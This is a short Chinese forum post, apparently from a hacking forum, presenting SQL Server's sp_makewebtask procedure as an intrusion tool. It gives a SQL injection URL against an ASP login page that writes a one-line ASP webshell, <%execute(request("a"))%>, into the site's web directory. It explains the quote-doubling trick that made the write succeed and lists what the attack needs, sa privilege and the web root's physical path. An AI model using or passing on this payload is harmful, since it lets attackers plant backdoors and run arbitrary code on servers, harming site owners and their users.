sp_makewebtask在入侵中的使用
用 sp_makewebtask直接在web目录里写入一句话马:[code]
[url]http://127.0.0.1/dblogin123.asp?username=123'[/url]; ... k%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
[/code]
前提是注入点是sa权限。
sp_makewebtask真是个好东西,知道表名就能够输出内容了。其中的一个问题困扰了我很久,今天终于得到解决:在用sp_makewebtask往文件里面写东西的时候,用到了select语句,但是只是用它来写
[code]
<%execute(request("a"))%>
[/code]
,并不是对某个列的查询,写入一直出错。由于sp_makewebtask的第二个参数本身有个单引号在外面了,本以为select后面的内容加双引号就能成功写进去了,但是总是不能,今天看联机文档的时候偶尔发现是用两个单引号来直接写文本,本机试验了下,成功写入!
sp_makewebtask的要求权限是sa,而且用这种方法的时候需要知道WEB的物理路径。但是有的管理员会删除某些扩展存储过程,这种方法也能算是个思路吧
页:
[1]